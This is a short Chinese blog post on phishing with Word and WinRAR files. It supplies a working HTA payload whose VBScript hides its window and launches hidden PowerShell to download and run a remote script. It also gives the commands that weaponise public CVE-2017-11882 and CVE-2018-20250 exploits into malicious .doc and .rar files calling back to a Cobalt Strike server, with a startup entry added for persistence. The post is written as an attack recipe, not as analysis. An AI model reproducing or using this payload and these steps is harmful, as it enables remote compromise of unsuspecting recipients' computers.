word,winrar钓鱼

办公软件钓鱼

没有任何技术含量,不想改什么十六进制,看的眼睛疼,用别人的exp简单粗暴!

office

一.CobaltStrike

部署listener

部署攻击脚本

二.HTA

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<html>
<head>
<script language="VBScript">
Sub window_onload
window.resizeTo 0,0
window.MoveTo -100,-100
const impersonation = 3
Const HIDDEN_WINDOW = 12
Set Locator = CreateObject("WScript.Shell")
Locator.Run"powershell.exe -nop -w hidden -c ""IEX (new-object net.webclient).downloadstring('http://XXXXXXXXXXX/a')""",0,FALSE
window.close()
end sub
</script>
</head>
</html>

关键命令行为Locator.Run“命令”,其中的命令为图片2部署的powershell攻击脚本,直接将CS中的命令复制进来即可。建立好HTA之后上传到CS中,如图:

使用脚本生成doc

脚本地址:https://github.com/Ridter/CVE-2017-11882

1
python Command109b_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc

其中的url地址为你部署的hta地址。

三.测试

无任何弹窗,并且成功上线CS



WINRAR

EXP利用

脚本地址:https://github.com/WyAtu/CVE-2018-20250

注意事项:

1.windows下python3

2.下载安装winace

3.修改exp中地址

1
python exp.py

直接生成test.rar,名称,文件内容,均可在exp.py中手动修改。

CobaltStrike利用

生成exe:

添加到开机启动项:

重启上线:

留言

2019-03-28

本文总阅读量
⬆︎TOP